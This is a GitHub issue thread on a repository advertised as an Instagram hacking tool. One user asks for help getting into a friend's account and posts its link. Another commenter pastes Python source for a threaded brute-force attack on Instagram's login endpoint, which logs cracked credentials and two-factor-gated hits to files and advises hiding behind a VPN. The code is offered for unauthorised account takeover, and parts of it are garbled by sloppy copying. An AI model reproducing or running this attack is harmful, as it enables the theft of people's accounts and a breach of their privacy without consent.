akashblackhat / instagrame-hacking

best script for hacking instagram /instagrame-hacking is a bash based script which is officially made to test password strength of instagram account from termux with bruteforce attack and This tool works on both rooted Android device and Non-rooted Android device.
https://www.youtube.com/channel/UCWlAUmBOM07RXwwfZyfj_uw
MIT License
195 stars 50 forks source link

Instagram hacker #7

Open Ahmedtakrit opened 8 months ago

Ahmedtakrit commented 8 months ago

Find the password for my friend's Instagram account I hope you can help, and here is the link to his personal account https://instagram.com/ali89.om?igshid=OGQ5ZDc2ODk2ZA==

Sumit1763 commented 7 months ago

author : akash black hat hacke

darkweb pleyer 127.0.0.1

from future import absolute_import from future import print_function import requests, sys, threading, time, os, random from random import randint from six.moves import input

CheckVersion = str(sys.version) import re from datetime import datetime

print('''
\033[32m██╗███╗ ██╗███████╗████████╗ █████╗
██║████╗ ██║██╔════╝╚══██╔══╝██╔══██╗
██║██╔██╗ ██║███████╗ ██║ ███████║
██║██║╚██╗██║╚════██║ ██║ ██╔══██║
██║██║ ╚████║███████║ ██║ ██║ ██║
╚═╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═╝ ╚═╝ ┌┐ ┬─┐┬ ┬┌┬┐ ┌─┐┌─┐┬─┐┌─┐┌─┐ V1.0 ├┴┐├┬┘│ │ │ ├┤ │ │├┬┘│ ├┤
└─┘┴└─└─┘ ┴ └ └─┘┴└─└─┘└─┘
\033[38m\033[31mInstgrame Brute Force Attack \033[38m \033[33m\033[32mDeveloper:AKASH BLACK HAT \033[33m \033[35m\033[32mInstagram:akashblackhat \033[35m \033[31m\033[32mYouTube :Technical akash skills \033[31m \033[37m\033[32mPassList :Attack\033[37m \033[35m**\033[31m\033[33m\033[32m***''') print('''\033[31mNotice :-> Management depends on vpn software Please use it before running the tool.\033[32m.''') class InstaBrute(object): def init(self):

    try:
        user = input('username : ')
        Combo = input('passList : ')
        print('\n----------------------------')

    except:
        print(' The tool was arrested exit ')
        sys.exit()

    with open(Combo, 'r') as x:
        Combolist = x.read().splitlines()
    thread = []
    self.Coutprox = 0
    for combo in Combolist:
        password = combo.split(':')[0]
        t = threading.Thread(target=self.New_Br, args=(user, password))
        t.start()
        thread.append(t)
        time.sleep(0.9)
    for j in thread:
        j.join()

def cls(self):
    linux = 'clear'
    windows = 'cls'
    os.system([linux, windows][os.name == 'nt'])

def New_Br(self, user, pwd):
    link = 'https://www.instagram.com/accounts/login/'
    login_url = 'https://www.instagram.com/accounts/login/ajax/'

    time = int(datetime.now().timestamp())

    payload = {
        'username': user,
        'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{pwd}',
        'queryParams': {},
        'optIntoOneTap': 'false'
    }

    with requests.Session() as s:
        r = s.get(link)
        csrf = re.findall(r"csrf_token\":\"(.*?)\"", r.text)[0]
        r = s.post(login_url, data=payload, headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
            "X-Requested-With": "XMLHttpRequest",
            "Referer": "https://www.instagram.com/accounts/login/",
            "x-csrftoken": csrf
        })
        print(f'{user}:{pwd}\n----------------------------')

        if 'authenticated": true' in r.text:
            print(('' + user + ':' + pwd + ' --> Good hack '))
            with open('good.txt', 'a') as x:
                x.write(user + ':' + pwd + '\n')
        elif 'two_factor_required' in r.text:
            print(('' + user + ':' + pwd + ' -->  Good It has to be checked '))
            with open('results_NeedVerfiy.txt', 'a') as x:
                x.write(user + ':' + pwd + '\n')

InstaBrute()